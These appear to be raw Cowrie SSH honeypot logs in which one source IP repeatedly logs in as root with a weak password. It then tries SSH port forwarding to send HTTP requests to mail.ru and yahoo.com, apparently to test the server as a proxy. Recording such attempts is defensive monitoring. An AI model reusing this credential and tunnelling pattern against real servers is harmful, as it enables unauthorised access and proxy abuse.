{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:14.929829Z","src_ip":"77.83.207.83","session":"fcaa8f036d06"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.177582Z","src_ip":"77.83.207.83","session":"fcaa8f036d06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":18290,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:18290","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.228085Z","session":"fcaa8f036d06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.277954Z","src_ip":"77.83.207.83","session":"fcaa8f036d06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15219,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15219","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.420257Z","session":"fcaa8f036d06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.470213Z","src_ip":"77.83.207.83","session":"fcaa8f036d06"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":9154,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9154","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.612190Z","session":"fcaa8f036d06"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.662034Z","src_ip":"77.83.207.83","session":"fcaa8f036d06"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.712844Z","src_ip":"77.83.207.83","session":"fcaa8f036d06"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":22221,"dst_ip":"1.2.3.4","dst_port":22,"session":"596ecbefb96d","protocol":"ssh","message":"New connection: 77.83.207.83:22221 (1.2.3.4:22) [session: 596ecbefb96d]","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.761461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.762236Z","src_ip":"77.83.207.83","session":"596ecbefb96d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:15.812205Z","src_ip":"77.83.207.83","session":"596ecbefb96d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.059260Z","src_ip":"77.83.207.83","session":"596ecbefb96d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6553,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6553","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.109772Z","session":"596ecbefb96d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.159454Z","src_ip":"77.83.207.83","session":"596ecbefb96d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":23089,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23089","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.300080Z","session":"596ecbefb96d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.349644Z","src_ip":"77.83.207.83","session":"596ecbefb96d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":22629,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22629","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.492177Z","session":"596ecbefb96d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.542048Z","src_ip":"77.83.207.83","session":"596ecbefb96d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.592478Z","src_ip":"77.83.207.83","session":"596ecbefb96d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":22347,"dst_ip":"1.2.3.4","dst_port":22,"session":"db0454470d37","protocol":"ssh","message":"New connection: 77.83.207.83:22347 (1.2.3.4:22) [session: db0454470d37]","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.642331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.643259Z","src_ip":"77.83.207.83","session":"db0454470d37"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.693799Z","src_ip":"77.83.207.83","session":"db0454470d37"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.945584Z","src_ip":"77.83.207.83","session":"db0454470d37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26702,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26702","sensor":"my-vps","timestamp":"2025-08-31T03:51:16.997060Z","session":"db0454470d37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.047640Z","src_ip":"77.83.207.83","session":"db0454470d37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":15604,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:15604","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.188927Z","session":"db0454470d37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.239725Z","src_ip":"77.83.207.83","session":"db0454470d37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":28739,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28739","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.385086Z","session":"db0454470d37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.435754Z","src_ip":"77.83.207.83","session":"db0454470d37"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.487218Z","src_ip":"77.83.207.83","session":"db0454470d37"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":22478,"dst_ip":"1.2.3.4","dst_port":22,"session":"db09fc0cb74f","protocol":"ssh","message":"New connection: 77.83.207.83:22478 (1.2.3.4:22) [session: db09fc0cb74f]","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.537649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.538615Z","src_ip":"77.83.207.83","session":"db09fc0cb74f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.589593Z","src_ip":"77.83.207.83","session":"db09fc0cb74f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.843450Z","src_ip":"77.83.207.83","session":"db09fc0cb74f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20450,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20450","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.895444Z","session":"db09fc0cb74f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:17.946518Z","src_ip":"77.83.207.83","session":"db09fc0cb74f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15785,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15785","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.089297Z","session":"db09fc0cb74f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.140316Z","src_ip":"77.83.207.83","session":"db09fc0cb74f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":10429,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10429","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.285368Z","session":"db09fc0cb74f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.336499Z","src_ip":"77.83.207.83","session":"db09fc0cb74f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.388718Z","src_ip":"77.83.207.83","session":"db09fc0cb74f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":22600,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb7a7ed6f736","protocol":"ssh","message":"New connection: 77.83.207.83:22600 (1.2.3.4:22) [session: eb7a7ed6f736]","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.438077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.438873Z","src_ip":"77.83.207.83","session":"eb7a7ed6f736"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.489539Z","src_ip":"77.83.207.83","session":"eb7a7ed6f736"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.740746Z","src_ip":"77.83.207.83","session":"eb7a7ed6f736"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3233,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:3233","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.791993Z","session":"eb7a7ed6f736"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.842418Z","src_ip":"77.83.207.83","session":"eb7a7ed6f736"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3514,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3514","sensor":"my-vps","timestamp":"2025-08-31T03:51:18.984785Z","session":"eb7a7ed6f736"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.035291Z","src_ip":"77.83.207.83","session":"eb7a7ed6f736"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":18208,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18208","sensor":"my-vps","timestamp":"2025-08-31T03:51:19.176693Z","session":"eb7a7ed6f736"}
